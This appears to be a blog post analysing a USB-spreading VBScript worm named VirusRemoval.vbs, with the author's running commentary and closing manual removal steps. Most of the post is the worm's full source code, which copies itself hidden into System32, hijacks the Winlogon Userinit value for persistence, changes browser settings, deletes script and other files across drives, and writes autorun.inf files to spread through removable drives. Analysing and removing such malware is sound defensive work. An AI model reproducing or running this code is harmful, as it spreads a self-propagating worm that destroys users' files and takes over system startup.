Thanks to my revolving pen drive, I noticed on my XP SP2 running laptop, all folders started to open in New Windows, and that too, after hanging for few seconds. I have been using Avast! happily on the laptop for quite a while (3years), with confidence. I started a full scan. Finding nothing (Okay, it does find old versions of AceSpy files). But this virus! Nope.
While the scan, I inserted the drive in my another laptop running Vista, the autorun window popped up asking whether to run wscript.exe, or open the folder, or start the ready boost.
So, it got something. Understanding this machine is too important to play with, I am trying this on a PC, running XP.
The pen drive has two naughty files:-
The autorun.inf is just making sure that the virusremoval.vbs script is executed. Good for spreading this one.Lets give the VirusRemoval.vbs file a look:-
Section 1:
'****************************************************************** '********************* Virus Removal VBScript ********************* '************************** Version 1.00 ************************** '****************************************************************** 'This antivirus program is intended to repair your computer from 'any sorts of virus attacks. 'This program is exactly like a normal virus but it repairs things 'rather than destroying them. '****************************************************************** '****************************************************************** 'Program developed by 'Sujin Joshi 'http://Sujin.com.np 'sujinjoshi@gmail.com Option Explicit On Error Resume Next
Thanks Sujin, I am surely confident this isn't a normal virus. This is worst them then in design.
Dim Fso,Shells,SystemDir,WinDir,Count,File,Drv,Drives,InDrive,ReadAll,AllFile,WriteAll,Del,Chg,folder,files,Delete,auto,root Set Fso = CreateObject("Scripting.FileSystemObject") Set Shells = CreateObject("Wscript.Shell") Set WinDir = Fso.GetSpecialFolder(0) Set SystemDir =Fso.GetSpecialFolder(1) Set File = Fso.GetFile(WScript.ScriptFullName) Set Drv = File.Drive
Set InDrive = Fso.drives
Set ReadAll = File.OpenAsTextStream(1,-2)
do while not ReadAll.atendofstream AllFile = AllFile & ReadAll.readline AllFile = AllFile & vbcrlf Loop
Sujin didnt put comment so, so far, he had defined some variables, and read the content of it self in an AllFile variable.
Count=Drv.DriveType 'Hmm all the drives... Do
'Create Text file VirusRemoval.vbs in SystemDir! But dude, why this is in loop? Also, he takes care to set the attributes to system, read-only and hidden.
'Ahem, nice one, this is in loop cause VirusRemoval.vbs keep on running all the time on your system! Terminate wscript.exe from Task Manager to stop running it!
If Not Fso.FileExists(SystemDir & "\VirusRemoval.vbs") then set WriteAll = Fso.CreateTextFile(SystemDir & "\VirusRemoval.vbs",2,true) WriteAll.Write AllFile WriteAll.close set WriteAll = Fso.GetFile(SystemDir & "\VirusRemoval.vbs") WriteAll.Attributes = -1 End If
'Ok, these all are explained quite well at PC Tools registry guide, so I leave it! 'Sujin did you get it there?
'Delete all these keys from registries! Shells.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Window Title","Sujin.com.np"
Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions","0","REG_DWORD"
Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr","0","REG_DWORD"
Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools","0","REG_DWORD"
Shells.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://sujin.com.np/"
Shells.RegWrite "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell","explorer.exe"
'Now here is where the virus keep itself in memory
'Userinit is the first program that runs after WinLogon completes its work, it loads the shell explorer.exe, and you can replace it with your own shell.
Shells.RegWrite "HKLM\Software\Microsoft\Windows
NT\CurrentVersion\Winlogon\Userinit",SystemDir & "\userinit.exe," & _
SystemDir & "\wscript.exe " & SystemDir & "\VirusRemoval.vbs"
'The below section will launch explorer.exe! Remember, now, your shell is wscript.exe VirusRemoval.vbs, so explorer.exe need to be loaded to actually load your desktop.
For Each Drives In InDrive
root = Drives.Path & "\"
If Fso.GetParentFolderName(WScript.ScriptFullName)=root Then
Shells.Run "explorer.exe " & root
End If
Set folder=Fso.GetFolder(root)
Set Delete = Fso.DeleteFile(SystemDir & "\killvbs.vbs",true)
For Each files In folder.Files
auto=Left(files.Name,7)
If UCase(auto)=UCase("autorun") Then
Set Delete = Fso.DeleteFile(root & files.Name,true)
End If
Next
If Drives.DriveType=2 Then
delext "inf",Drives.Path & "\"
delext "INF",Drives.Path & "\"
End if
If Drives.DriveType = 1 Or Drives.DriveType = 2 Then
If Drives.Path<> "A:" Then
delext "vbs",WinDir & "\"
delext "vbs",Drives.Path & "\"
If Fso.FileExists(Drives.Path & "\ravmon.exe") Then
Fso.DeleteFile(Drives.Path & "\ravmon.exe")
End If
If Fso.FileExists(Drives.Path & "\sxs.exe") Then
Fso.DeleteFile(Drives.Path & "\sxs.exe")
End If
If Fso.FileExists(Drives.Path & "\winfile.exe") Then
Fso.DeleteFile(Drives.Path & "\winfile.exe")
End If
If Fso.FileExists(Drives.Path & "\run.wsh") Then
Fso.DeleteFile(Drives.Path & "\run.wsh")
End If
If Drives.DriveType = 1 Then
If Drives.Path<>"A:" Then
If Not Fso.FileExists(Drives.Path & "\VirusRemoval.vbs") Then
Set WriteAll=Fso.CreateTextFile(Drives.Path & "\VirusRemoval.vbs",2,True)
WriteAll.Write AllFile
WriteAll.Close
Set WriteAll = Fso.GetFile(Drives.Path & "\VirusRemoval.vbs")
WriteAll.Attributes = -1
End If
'Take cares of creating Autorun.inf file
If Fso.FileExists(Drives.Path & "\autorun.inf") Or Fso.FileExists(Drives.Path & "\AUTORUN.INF") Then
Set Chg = Fso.GetFile(Drives.Path & "\autorun.inf")
Chg.Attributes = -8
Set WriteAll = Fso.CreateTextFile(Drives.Path & "\autorun.inf",2,True)
WriteAll.writeline "[autorun]"
WriteAll.WriteLine "open=wscript.exe VirusRemoval.vbs"
WriteAll.WriteLine "shell\open=Open"
WriteAll.WriteLine "shell\open\Command=wscript.exe VirusRemoval.vbs"
WriteAll.Close
Set WriteAll = Fso.GetFile(Drives.Path & "\autorun.inf")
WriteAll.Attributes = -1
else
Set WriteAll = Fso.CreateTextFile(Drives.Path & "\autorun.inf",2,True)
WriteAll.writeline "[autorun]"
WriteAll.WriteLine "open=wscript.exe VirusRemoval.vbs"
WriteAll.WriteLine "shell\open=Open"
WriteAll.WriteLine "shell\open\Command=wscript.exe VirusRemoval.vbs"
WriteAll.Close
Set WriteAll = Fso.GetFile(Drives.Path & "\autorun.inf")
WriteAll.Attributes = -1
End if
End If
End If
End if
End If
Next
if Count <> 1 then
Wscript.sleep 10000
end if
loop while Count<>1
'Function to delete any file
sub delext(File2Find, SrchPath)
Dim oFileSys, oFolder, oFile,Cut,Delete
Set oFileSys = CreateObject("Scripting.FileSystemObject")
Set oFolder = oFileSys.GetFolder(SrchPath)
For Each oFile In oFolder.Files
Cut=Right(oFile.Name,3)
If UCase(Cut)=UCase(file2find) Then
If oFile.Name <> "VirusRemoval.vbs" Then Set Delete = oFileSys.DeleteFile(srchpath & oFile.Name,true)
End If
Next
End sub
REMOVAL INSTRUCTIONS
- Terminate WSCRIPT.EXE process from Task Manager.
- If you still have the Pen Drive in, then Open DOS, cmd at Run, go to your pen drive's drive (say X:)
- X:
- Attrib -S -H -R VirusRemoval.vbs
- DEL VirusRemoval.vbs
- Attrib -S -H -R Autorun.inf
- DEL AutoRun.inf
- Move back to your root folder
- CD Windows\System32
- Attrib -S -H -R VirusRemoval.vbs
- DEL VirusRemoval.vbs
- AND BEFORE YOU RESTART, CHANGE THE USERINIT value to explorer.exe
That's it.
You should also manually get back your registry settings as you can see in the code.
